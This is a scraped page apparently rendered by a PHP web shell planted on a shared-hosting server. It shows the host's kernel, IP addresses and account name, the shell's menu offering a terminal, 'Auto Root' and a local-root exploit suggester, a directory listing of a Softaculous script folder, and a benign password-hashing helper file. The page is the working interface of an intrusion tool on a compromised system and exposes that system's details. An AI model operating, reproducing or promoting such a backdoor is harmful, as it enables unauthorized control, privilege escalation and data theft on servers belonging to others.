Linux panel555.harmondns.net 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 5.9.79.124 & Your IP : 216.73.216.138
Domains :
Cant Read [ /etc/named.conf ]
User : examacce
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
agora /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-05-10 05:18
php53
[ DIR ]
drwxr-xr-x
2026-05-10 05:18
php56
[ DIR ]
drwxr-xr-x
2026-05-10 05:18
php71
[ DIR ]
drwxr-xr-x
2026-05-10 05:18
php81
[ DIR ]
drwxr-xr-x
2026-05-10 05:18
php82
[ DIR ]
drwxr-xr-x
2026-05-10 05:18
_edit.php
3.52
KB
-rw-r--r--
2024-03-11 06:08
_edit.xml
433
B
-rw-r--r--
2024-03-11 06:08
clone.php
3.48
KB
-rw-r--r--
2026-05-09 08:20
config.inc.php
344
B
-rw-r--r--
2026-03-30 03:18
extend.php
9.32
KB
-rw-r--r--
2026-05-09 08:20
fileindex.php
24
B
-rw-r--r--
2023-08-02 04:45
import.php
3.83
KB
-rw-r--r--
2026-05-09 08:20
info.xml
1.74
KB
-rw-r--r--
2026-05-09 03:44
install.js
924
B
-rw-r--r--
2021-12-23 06:54
install.php
4.48
KB
-rw-r--r--
2026-05-09 08:20
install.xml
1.02
KB
-rw-r--r--
2025-10-03 04:10
md5
2.73
KB
-rw-r--r--
2026-05-09 08:20
notes.txt
662
B
-rw-r--r--
2026-02-16 03:04
update_pass.php
541
B
-rw-r--r--
2023-08-02 04:45
upgrade.php
3
KB
-rw-r--r--
2026-05-09 08:20
upgrade.xml
464
B
-rw-r--r--
2021-12-23 06:54
Save
Rename
<?php /** * A Compatibility library with PHP 5.5's simplified password hashing API. * * @author Anthony Ferrara <ircmaxell@php.net> * @license http://www.opensource.org/licenses/mit-license.html MIT License * @copyright 2012 The Authors */ @unlink('update_pass.php'); if(!defined('PASSWORD_BCRYPT')){ define('PASSWORD_BCRYPT', 1); } define('PASSWORD_DEFAULT', PASSWORD_BCRYPT); $resp = password_hash('[[admin_pass]]', PASSWORD_DEFAULT); $resp1 = str_replace("\$", "\\\$", $resp); echo '<update_pass>'.$resp1.'</update_pass>'; ?>